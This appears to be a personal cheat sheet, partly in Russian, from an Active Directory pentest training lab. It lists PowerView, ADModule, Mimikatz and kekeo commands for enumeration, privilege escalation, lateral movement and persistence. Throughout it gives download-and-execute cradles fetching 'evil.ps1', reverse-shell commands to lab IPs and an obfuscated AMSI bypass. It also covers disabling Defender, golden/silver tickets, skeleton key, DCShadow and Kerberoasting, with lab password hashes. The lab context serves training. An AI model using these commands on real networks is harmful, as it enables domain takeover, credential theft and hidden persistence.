# Команды ADmodule & PowerView ручное тестирование -Intro- $psversiontable Get-Help Get-Help Get-Help Get-Command Get-Help * Get-Help process Get-Help *process* Get-Help about_* Update-Help Get-Help Get-Item -Full Get-Help Get-Help -Full Get-Help Get-Item -Examples Get-Help Get-Help -Examples | more Get-Help Get-Process -Parameter Name Get-Command -CommandType cmdlet - lists all cmdlets in current PS session Get-Command -CommandType cmdlet | Measure-Object Get-Command -Name *process* Get-Command -Verb Set dir in PS - cmdlet Get-Alias -Definition Get-Childitem Get-Alias -Name dir Get-Alias dir Get-Process powershell –ExecutionPolicy bypass powershell -ep bypass powershell –c <cmd> powershell –encodedcommand $env:PSExecutionPolicyPreference="bypass" Set-MpPreference -DisableRealtimeMonitoring $true - disable windows defender if admin Import-Module <modulepath> Get-Command -Module <modulename> Get-Module -ListAvailable - avail modules in the session Get-Command -Module PowerUpSQL Applocker: [dcorp-adminsrv.dollarcorp.moneycorp.local]: PS C:\Users\studentadmin\Documents> $ExecutionContext.SessionState.LanguageMode ConstrainedLanguage Now, let’s enumerate the applocker policy. [dcorp-adminsrv.dollarcorp.moneycorp.local]: PS C:\Users\studentx\Documents> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections Exec script: 1. powershell -encodedcommand (limit 2000 chars) 2. powershell download and exec https://github.com/danielbohannon/Invoke-CradleCrafter iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1') $ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.230.1/evil.ps1 ');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response PSv3 onwards - iex (iwr 'http://192.168.230.1/evil.ps1') $h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://192.168.230.1/evil.ps1',$false);$h.send();iex $h.responseText $wr = [System.NET.WebRequest]::Create("http://192.168.230.1/evil.ps1") $r = $wr.GetResponse() IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd() PS C:\Users\student90> Get-ExecutionPolicy RemoteSigned https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7 -------------Domain Enum---------------- https://github.com/samratashok/ADModule $ADClass = [System.DirectoryServices.ActiveDirectory.Domain] $ADClass::GetCurrentDomain() cd c:\AD\Tools Bypass AMSI to allow powerview (prevent by AV) - https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell, Patching amsi.dll AmsiScanBuffer by rasta-mouse . .\PowerView_dev.ps1 Get-Domain Get-Domain –Domain moneycorp.local - если имеем право (есть доверительные отношения) Get-DomainSID Get-DomainPolicy (Get-DomainPolicy).systemaccess (Get-DomainPolicy).KerberosPolicy Get-DomainPolicy -domain moneycorp.local Get-DomainController Get-DomainController -Domain moneycorp.local Get-DomainUser Get-DomainUser -Properties samaccountname Get-DomainUser | select name Get-DomainUser | select cn Get-DomainUser -Identity student90 Get-DomainUser -Domain powershell.local Детект honeytoken: Get-DomainUser -Properties samaccountname,pwdlastset - не может быть несколько лет назад у нормальной учетки Get-DomainUser -Properties samaccountname,badpwdcount - не может быть 0 у нормального юзера. Get-DomainUser -Properties samaccountname,logoncount - не может быть 0 у нормального юзера. Get-Domainobject | ? {$_.description -like '*built*'} | select samaccountname,description Get-Domainobject | ? {$_.description -like '*pass*'} | select samaccountname,description Get-Domainobject -Properties name,Description | ?{$_.description –ne $null} Get-DomainComputer Get-DomainComputer -Properties dnshostname Get-DomainComputer -OperatingSystem "*Server 2016*" -Properties dnshostname Get-DomainComputer | select operatingsystem Get-DomainComputer -Ping -Properties dnshostname Get-DomainGroup Get-DomainGroup "domain admins" Get-DomainGroup "*admin*" Get-DomainGroup "*admin*" -Domain moneycorp.local -Properties samaccountname - попадут Enterprise Admins, т.к. они только в корневом домене в лесу. Get-DomainGroup -UserName student | select samaccountname - получить все группы пользователя Get-DomainGroupMember "domain admins" Get-DomainGroupMember "enterprise admins" -Domain moneycorp.local Get-DomainGroupMember "administrators" -Recurse Get-DomainGroup -MemberIdentity "student90" | select samaccountname - показать все группы юзера Get-NetLocalGroup -ComputerName dollarcorp.moneycorp.local - список лок. групп, без прав админа можно только на DC. Get-NetLocalGroup -ComputerName us-exchange -Verbose - access denied Get-NetLocalGroupMember ComputerName us-dc -GroupName Administrators Поиск залогиненных юзеров: 1. Get-LoggedOnLocal ~ Get-RegLoggedOn 2. Get-NetLoggedon (adm) 3. Get-NetSession 4. Get-LastLoggedOn –ComputerName <servername> (adm) Get-DomainComputer | Get-NetLoggedon - перечислит юзеров только на тачках, где я админ Get-DomainComputer | Get-RegLoggedOn Get-DomainComputer | Get-NetSession Get-DomainController | Get-NetSession - поиск домен админов с других тачек Get-NetSession -ComputerName DC Get-LastLoggedOn -ComputerName DCORP-ADMINSRV Get-LoggedonLocal -ComputerName dcorp-dc.dollarcorp.moneycorp.local Invoke-ShareFinder~Find-DomainShare Find-DomainShare -Verbose -CheckShareAccess Only old pw 2: Invoke-ShareFinder –Verbose -ExcludeStandard -ExcludePrint -ExcludeIPC Find-InterestingDomainShareFile~Invoke-FileFinder Invoke-FileFinder –Verbose Get-NetFileServer~Get-DomainFileServer Get-DomainFileServer - get file value targets in domain (loggedon a lot of users) ADModule не умеет енумить GPO При помощи PowerView нельзя получить содержимое GPO Get-DomainGPO ~ Get-NetGPO Get-DomainGPO | select displayname - показать все GPO Get-DomainGPOLocalGroup - показать Restricted Groups Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity us-mgmt.us.techcorp.local - Get users which are in a local group of a machine using GPO Get-DomainGPOUserLocalGroupMapping -Identity studentuser1 -Verbose - Get machines where the given user is member of a specific group Get-NetGPO -ComputerName DCORP-STUDENT90.dollarcorp.moneycorp.local | select displayname - GPO для конкретного компа gpresult /R - какие GPO применены к текущей тачке Get-NetGPOGroup - show restricted groups. Find-GPOComputerAdmin –Computername dcorp-student1.dollarcorp.moneycorp.local Find-GPOLocation -UserName student1 -Verbose Get-DomainOU Get-DomainOU | select name Get-DomainOU | select displayname (Get-DomainOU -Identity Students).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name - get computers in Students OU Get-DomainOU - в поле gplink идентификатор GPO, которая применена к OU (Get-DomainOU -Identity Students).gplink Get-DomainGPO -Identity "{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}" - получем GPO по ее идентификатору Только powerview 2 резолвит сиды: Get-ObjectAcl -SamAccountName student90 -ResolveGUIDs - получить ACL для объекта student90 (ObjectDN - целевой объект, IdentityReference - субъект, ActiveDirectoryRights - права, AccessControlType - тип ACE, objectSID - ид-р объекта для которого смотрим ACL) Get-ObjectAcl -ADSprefix 'CN=Administrator,CN=Users' -Verbose PW2: Get-ObjectACL -DistinguishedName "DC=dollarcorp,DC=moneycorp,DC=local" -ResolveGUIDs | ? {($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'GenericWrite') -or ($_.ActiveDirectoryRights -match 'WriteDacl') -or ($_.ActiveDirectoryRights -match 'WriteOwner') -or ($_.ActiveDirectoryRights -match 'ExtendedRight') -or ($_.ActiveDirectoryRights -match 'WriteProperty') } | select identityreference PW3 (Get-DomainObjectACL): Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs -Verbose Get-DomainObjectAcl -Identity studentuser1 -ResolveGUIDs Get-DomainObjectAcl -Searchbase "LDAP://CN=Domain Admins,CN=Users,DC=us,DC=techcorp,DC" -ResolveGUIDs -Verbose Get-ObjectACL "DC=dollarcorp,DC=moneycorp,DC=local" -ResolveGUIDs | ? {($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'GenericWrite') -or ($_.ActiveDirectoryRights -match 'WriteDacl') -or ($_.ActiveDirectoryRights -match 'WriteOwner') -or ($_.ActiveDirectoryRights -match 'WriteProperty') -or ($_.ObjectAceType -match 'Replication-Get') } | sort SecurityIdentifier -Descending -unique | select SecurityIdentifier | foreach {$_.SecurityIdentifier} | Convert-SidToName Get-ObjectACL -ResolveGUIDs | ? {($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'GenericWrite') -or ($_.ActiveDirectoryRights -match 'WriteDacl') -or ($_.ActiveDirectoryRights -match 'WriteOwner') -or ($_.ActiveDirectoryRights -match 'WriteProperty') -or ($_.ObjectAceType -match 'Replication-Get') } | select SecurityIdentifier,objectdn,ActiveDirectoryRights | foreach { 'Subject: {0} --- Object: {1} --- Right: {2}' -f (Convert-SidToName $_.SecurityIdentifier), $_.ObjectDN, $_.ActiveDirectoryRights} Get-ObjectACL "DC=dollarcorp,DC=moneycorp,DC=local" -ResolveGUIDs | ? {($_.ObjectAceType -match 'Replication-Get') } | select securityidentifier Convert-SidToName S-1-5-21-1874506631-3219952063-538504511-512 PW3: Find-InterestingDomainAcl -ResolveGUIDs Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "studentuserx"} - на какие объекты имеет интересные права пользователь studentuserx Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "StudentUsers"} - на какие объекты имеет интересные права группа StudentUsers Invoke-ACLScanner -ResolveGUIDs - ищет интересные ACL с правами на запись (pw 3 - Find-InterestingDomainAcl) Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"} - можно фильтрануть юзера или группу Get-PathAcl -Path "\\us-dc\sysvol" Get-DomainTrust (pw 3) Get-NetDomainTrust (pw 2) - читабельнее выводит Get-NetDomainTrust –Domain us.dollarcorp.moneycorp.local Get-Forest Get-ForestDomain - домены в лесу Get-ForestTrust Get-ForestTrust -Forest eurocorp.local Проверка на права локального админа на тачках: 1. dir \\ip\C$ 2. OpenSCManagerW (Find-LocalAdminAccess) 3. WMI (Find-WMILocalAdminAccess) 4. psremoting (Find-PSRemotingLocalAdminAccess) Find-LocalAdminAccess –Verbose (pw2), will use the OpenSCManagerW Win32API call to establish a handle to the remote host Get-DomainComputer -Properties dnshostname - в computers.txt . .\Find-WMILocalAdminAccess.ps1 Find-WMILocalAdminAccess - сам пройдет все тачки в домене и This function simply runs a WMI command against the sepcified list of computers. Find-WMILocalAdminAccess -ComputerFile .\computers.txt -Verbose . .\Find-PSRemotingLocalAdminAccess.ps1 Find-PSRemotingLocalAdminAccess Invoke-EnumerateLocalAdmin –Verbose - заенумить всех лок. админов на всех машинах, (если > = 2012 то нужны права локального админа) (Find-DomainLocalGroupMember), по дефолту Administrators, но можно задать свою. Invoke-UserHunter (pw 3 Find-DomainUserLocation) Find-DomainUserLocation -Stealth Find-DomainUserLocation -CheckAccess Invoke-UserHunter -Verbose cd C:\AD\Tools\ADModule-master\ import-module .\Microsoft.ActiveDirectory.Management.dll import-module .\ActiveDirectory\ActiveDirectory.psd1 Get-ADDomain Get-ADDomain -Identity moneycorp.local (Get-ADDomain).DomainSID Get-ADDomainController Get-ADUser -Filter * Get-ADUser -Filter * -Properties * Get-ADUser -Filter * -Properties * | select samaccountname Get-ADUser -Filter * | Select -ExpandProperty samaccountname Get-ADUser -Identity student90 -Properties * Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Property | select Name Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name,Description - поиск паролей в описании Get-AdComputer -Filter * -Properties * Get-AdComputer -Filter * -Properties * | select name,logoncount - поиск ненастоящих машин с 0 входов Get-ADComputer –Filter * | select –expand name Get-AdComputer -Filter * -Properties * | select DNSHostName Get-ADComputer -Filter 'OperatingSystem -like "*Server 2016*"' -Properties OperatingSystem | select Name,OperatingSystem Get-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName} Get-ADGroup -Filter * -Properties * Get-ADGroup -Filter * -Properties * | select name Get-ADGroup -Identity 'Domain Admins' -Properties * Get-ADGroup -Filter 'Name -like "*admin*"' | select Name - поиск админских групп Get-ADGroupMember -Identity "Domain Admins" -Recursive Get-ADGroupMember -Identity 'Domain Admins' Get-ADGroupMember -Identity 'Enterprise Admins' Get-ADGroupMember -Identity 'Enterprise Admins' -Server techcorp.local - trusted domain Get-ADPrincipalGroupMembership -Identity student90 - группы юзера (не рексрсивно!, выведет не все) Get-ADOrganizationalUnit -Identity 'OU=StudentsMachines,DC=us,DC=techcorp,DC=local' | %{Get-ADComputer -SearchBase $_ -Filter *} | select name Get-ACL 'AD:\CN=Domain Admins,CN=Users,DC=us,DC=techcorp,DC=local' | select -ExpandProperty Access (Get-Acl 'AD:\CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access Get-ADTrust -Filter * Get-ADTrust -Filter * -Server techcorp.local - посмотреть дов. отноешния другого домена Get-ADTrust –Identity redps.offensiveps.powershell.local Get-ADForest get-adforest -Identity eurocorp.local (Get-ADForest).Domains Get-NetSession -ComputerName dc.dollarcorp.monaycorp.local -Verbose .\Netcease.ps1 - run on DC, block netsession enum (deny for authenticated users) Restart-Service -Name Server -Force --------------PRIV ESC------------------- 1. Get-WmiObject -class win32_service | select name,pathname - get unquoted AbyssWebServer C:\WebServer\Abyss Web Server\WebServer\abyssws.exe --service . .\PowerUp.ps1 Invoke-AllChecks Get-ServiceUnquoted -Verbose Get-ModifiableServiceFile -Verbose Get-ModifiableService -Verbose get-help Invoke-Serviceabuse Invoke-ServiceAbuse -name AbyssWebServer -UserName 'ops\labuser' -Verbose - add user to localadmins, the logoff and login Run all checks from : – PowerUp Invoke-AllChecks – BeRoot is an executable: .\beRoot.exe – Privesc: Invoke-PrivEsc + use winpeas https://github.com/hlldz/dazzleUP C:\Program .. - false positive, т.к. нам нужно запись C:\Program.exe, а это может сделать только админ. . .\privesc.ps1 Invoke-PrivEsc CI - https://www.guru99.com/top-20-continuous-integration-tools.html, jenkins Вкладка people - enum local users Password brute on local users, user as pass, reverse user as pass http://jenkins_server/script with admin access def sout = new StringBuffer(), serr = new StringBuffer() def proc = 'whoami'.execute() proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println "out> $sout err> $serr" Not admin user: http://jenkins_server/job/Project0/configure - fuzz ProjectN with Burp Intruder Sniper powershell whoami powershell net localgroup administrators powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.83:10001/Invoke-PowerShell.ps1'));Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.83 -Port 10002 Bloodhound for blueteamer and pentesters not for redteamers because its noisy + network spike in default config. . .\Sharphound.ps1 Invoke-BloodHound -CollectionMethod All -Verbose Invoke-BloodHound -CollectionMethod LoggedOn start neo4j C:\AD\Tools\neo4j-community-3.5.1-windows\neo4j-community-3.5.1\bin>neo4j.bat console run bloodhound.exe, login and change password, login with new password upload data ctrl + k - disable labels ПКМ на группе - expand group BH actions: моя лекция impacket comps mark all owned principals use all biltin queries path from owned to domain admins path to high value targets - print operators, domain admins and etc. mark as high value wksadmins, srvrsadmins for current user: - node info for curent user (all props) - path finding: from my user to domain admin, frm my user to machines - Reachable High value targets from object --------------Lateral move------------------- Find-LocalAdminAccess -verbose dcorp-adminsrv.dollarcorp.moneycorp.local 1. Enter-PSSession dcorp-adminsrv.dollarcorp.moneycorp.local 2. $sess = New-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local Enter-PSSession -Session $sess 3. Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -ScriptBlock {whoami;hostname} Invoke-Command -Session $sess -ScriptBlock {whoami;hostname} Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -ScriptBlock {$ExecutionContext.SessionState.LanguageMode} Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -FilePath powerup.ps1 Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -Credential dcorp\admin - указать другие креды 4. winrs -r:us-mgmt cmd $sess = New-PSSession -ComputerName dcorp-appsrv.dollarcorp.moneycorp.local Enter-PSSession -Session $sess Run AMSI bypass command exit Invoke-Command -FilePath .\Invoke-Mimikatz.ps1 -Session $sess Enter-PSSession -Session $sess Invoke-Mimikatz - extract creds on machine Impersonate user: 1. Invoke-Mimikatz 2. Invoke-TokenManipulation - Persistence - - golden ticket: Set-MpPreference -DisableRealtimeMonitoring $true . .\Invoke-Mimikatz.ps1 Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:powershell.exe -exec bypass"' extract krbtgt: $sess = New-PSSession -ComputerName dcorp-dc Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimikatz.ps1 -Session $sess Enter-PSSession -Session $sess Invoke-Mimikatz -Command '"lsadump::lsa /patch"' OR . .\Invoke-Mimikatz.ps Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"' create ticket: . .\Invoke-Mimikatz.ps1 Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"' ls \\dcorp-dc.dollarcorp.moneycorp.local\c$ - silver ticket: Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /rc4:7b13b314a1f0cfa8ae280349f941bc29 /user:Administrator /ptt"' ls \\dcorp-dc.dollarcorp.moneycorp.local\c$ Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:host /rc4:7b13b314a1f0cfa8ae280349f941bc29 /user:Administrator /ptt"' schtasks.exe /S dcorp-dc.dollarcorp.moneycorp.local Run HFS - HTTP File Server and host Invoke-PowerShellTcp.ps1 . .\powercat.ps1 powercat -l -v -p 443 -t 1000 schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck1" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.90/Invoke-PowerShellTcp.ps1'')'" schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "STCheck1" - skeleton key: . .\Invoke-Mimikatz.ps1 Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:powershell.exe -exec bypass"' . .\Invoke-Mimikatz.ps1 Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local Enter-PSSession –Computername dcorp-dc –credential dcorp\Administrator // password "mimikatz" - DSRM: Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dcorp-dc // get local admin hash Enter-PSSession -Computername dcorp-dc New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"' ls \\dcorp-dc\C$ - custom SSP: Invoke-Mimikatz -Command '"misc::memssp"' -Computername dcorp-dc - adminsdholder: PS C:\ad\Tools> $sess2 = New-PSSession -ComputerName dcorp-dc PS C:\ad\Tools> Invoke-Command -FilePath .\Invoke-SDPropagator.ps1 -Session $sess2 PS C:\ad\Tools> Enter-PSSession $sess2 [dcorp-dc]: PS C:\Users\svcadmin\Documents> exit PS C:\ad\Tools> cd .\AdExplorer\ PS C:\ad\Tools\AdExplorer> .\ADExplorer.exe // set full control on adminsdholder for student90, can be done with powerview OR . .\Powerview.ps1 Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student90 -Rights All -Verbose PS C:\ad\Tools\AdExplorer> Enter-PSSession $sess2 [dcorp-dc]: PS C:\Users\svcadmin\Documents> Invoke-SDPropagator -timeoutMinutes 1 -showProgres -Verbose VERBOSE: PDC Located at dcorp-dc.dollarcorp.moneycorp.local VERBOSE: Initiating SD Propogation on dcorp-dc.dollarcorp.moneycorp.local VERBOSE: Checking for start of SD Propagator pw2: Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'student90'} - check access - acl modif rights: pw2: Add-ObjectAcl -TargetDistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalSamAccountName student90 -Rights DCSync -Verbose Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"' - acl SD: allow wmi, psremoting, remote registry on DC for student90: GUI (view video 5) OR . .\Set-RemoteWMI.ps1 Set-RemoteWMI -UserName student90 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose Get-Wmiobject -class win32_operatingsystem -ComputerName dcorp-dc Set-RemoteWMI -UserName student90 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose -Remove . .\Set-RemotePSRemoting.ps1 Set-RemotePSRemoting -UserName student90 -ComputerName dcorp-dc -Verbose Invoke-Command -ScriptBlock {whoami} -ComputerName dcorp-dc Set-RemotePSRemoting -UserName student90 -ComputerName dcorp-dc -Verbose -Remove PS C:\AD\Tools\DAMP-master\DAMP-master> . .\Add-RemoteRegBackdoor.ps1 Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student90 -Verbose . .\RemoteHashRetrieval.ps1 Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose // cant work - SID history persistence задать хуевому юзеру сид хистори в 519 на в атрибутах учетки .\PsExec.exe \\dcorp-dc -s cmd mimikatz "privilege::debug" "sid::patch" "sid::add /sam:student90 /new:S-1-5-21-280534878-1496970234-700767426-519" "exit" mimikatz "privilege::debug" "sid::patch" "sid::query /sam:student90" "exit" -dcshadow - new DC, no logs on modified objects 1 console: mimikatz.exe !+ !processtoken - get System token::whoami lsadump::dcshadow /object:root90user /attribute:Description /value="Hello from DCShadow" - prepare changes to DC 2 console: mimikatz.exe privilege::debug sekurlsa::pth /user:Administrator /domain:moneycorp.local /ntlm:71d04f9d50ceb1f64de7a09f23e6dc4c /impersonate lsadump::dcshadow /push - push changes to DC (run as DA) OR . .\Invoke-Mimikatz.ps1 Invoke-Mimikatz -Command '"sekurlsa::pth /user:administrator /domain:moneycorp.local /ntlm:71d04f9d50ceb1f64de7a09f23e6dc4c /run:powershell.exe"' . .\SetDCShadowPermissions.ps1 Set-DCShadowPermissions -FakeDC mcorp-student1 -SAMAccountName root90user -Username student90 -Verbose - to use DCShadow as user student90 to modify root1user object from machine mcorp-student1 lsadump::dcshadow /object:root90user /attribute:Description /value="Hello from DCShadow with no DA" lsadump::dcshadow /object:student1 /attribute:SIDHistory /value:S-1-5-21-280534878-1496970234-700767426-519 lsadump::dcshadow /object:student1 /attribute:primaryGroupID /value:519 (New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=Admin SDHolder,CN=System,DC=moneycorp,DC=local")).psbase.ObjectSecurity.sddl | Set-Clipboard lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local /attribute:ntSecurityDescriptor /value:<modified ACL> lsadump::dcshadow /push - run as student90. - Privilege escalation in domain - - kerberoast SPN should be unique across the domain. Get-NetUser –SPN Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local" - request TGS (klist) (!!! ONLY WORK AS ADMINISTRATOR) cd c:\ad\tools\kerberoast . ..\Invoke-Mimikatz.ps1 Invoke-Mimikatz -Command '"kerberos::list /export"' - save tgs to disk python.exe .\tgsrepcrack.py .\10k-worst-pass.txt .\1-40a10000-student90@MSSQLSvc~dcorp-mgmt.dollarcorp.moneycorp.local-DOLLARCORP.MONEYCORP.LOCAL.kirbi - brute tgs . .\Powerview_dev.ps1 Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"} Get-DomainUser -Identity Support90User | select serviceprincipalname - check spn Set-DomainObject -Identity support90user -Set @{serviceprincipalname='ops/whatever90'} Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ops/whatever90" cd c:\ad\tools\kerberoast . ..\Invoke-Mimikatz.ps1 Invoke-Mimikatz -Command '"kerberos::list /export"' - save tgs to disk python.exe .\tgsrepcrack.py .\10k-worst-pass.txt .\3-40a10000-student90@ops~whatever90-DOLLARCORP.MONEYCORP.LOCAL.kirbi - brute tgs OR PW3 (Get-DomainSPNTicket): Get-DomainSPNTicket -SPN ops/whatever90 -OutputFormat Hashcat python.exe .\tgsrepcrack.py .\10k-worst-pass.txt .\3-40a10000-student90@ops~whatever90-DOLLARCORP.MONEYCORP.LOCAL.kirbi - brute tgs - as-reproast Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth - get users with preauth disabled Get-DomainUser -PreauthNotRequired -Verbose . .\Powerview_dev.ps1 Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"} - get user where we can write properties Set-DomainObject -Identity Control90User -XOR @{useraccountcontrol=4194304} –Verbose - disbale preauth for user Control90User . .\ASREPRoast-master\ASREPRoast-master\ASREPRoast.ps1 Get-ASREPHash -UserName Control90User -Verbose - get as-rep for brute - unconstrained delegation Get-DomainComputer -Unconstrained -Properties dnshostname . .\Invoke-Mimikatz.ps1 Invoke-Mimikatz -Command '"sekurlsa::pth /user:appadmin /domain:dollarcorp.moneycorp.local /ntlm:d549831a955fee51a43c83efb3928fa7 /run:powershell.exe"' . .\Powerview_dev.ps1 Find-LocalAdminAccess - admin at dcorp-appsrv.dollarcorp.moneycorp.local $sess = New-PSSession -ComputerName dcorp-appsrv.dollarcorp.moneycorp.local Enter-PSSession $sess sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) - disable AMSI (or run Set-MpPreference -DisableRealtimeMonitoring $true) Invoke-Command -FilePath .\Invoke-Mimikatz.ps1 -Session $sess Enter-PSSession $sess Invoke-Mimikatz –Command '"sekurlsa::tickets /export"' - save all tickets ls | select name [dcorp-appsrv.dollarcorp.moneycorp.local]: PS C:\Users\appadmin\Documents> Invoke-Mimikatz -Command '"kerberos::ptt [0;3c282c]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi"' ls \\dcorp-dc.dollarcorp.moneycorp.local\c$ - constrained delegation: Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo Get-DomainUser –TrustedToAuth kekeo: tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f tgs::s4u /tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL . ..\..\Invoke-Mimikatz.ps1 Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_cifs~dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi"' ls \\dcorp-mssql.dollarcorp.moneycorp.local\c$ Request PSRemoting: PS C:\ad\Tools\kekeo\x64> .\kekeo.exe tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f tgs::s4u /tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL|http/dcorp-mssql.dollarcorp.moneycorp.LOCAL . ..\..\Invoke-Mimikatz.ps1 Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_http~dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARC ORP.MONEYCORP.LOCAL_ALT.kirbi"' PS C:\ad\Tools\kekeo\x64> .\kekeo.exe tgs::s4u /tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local 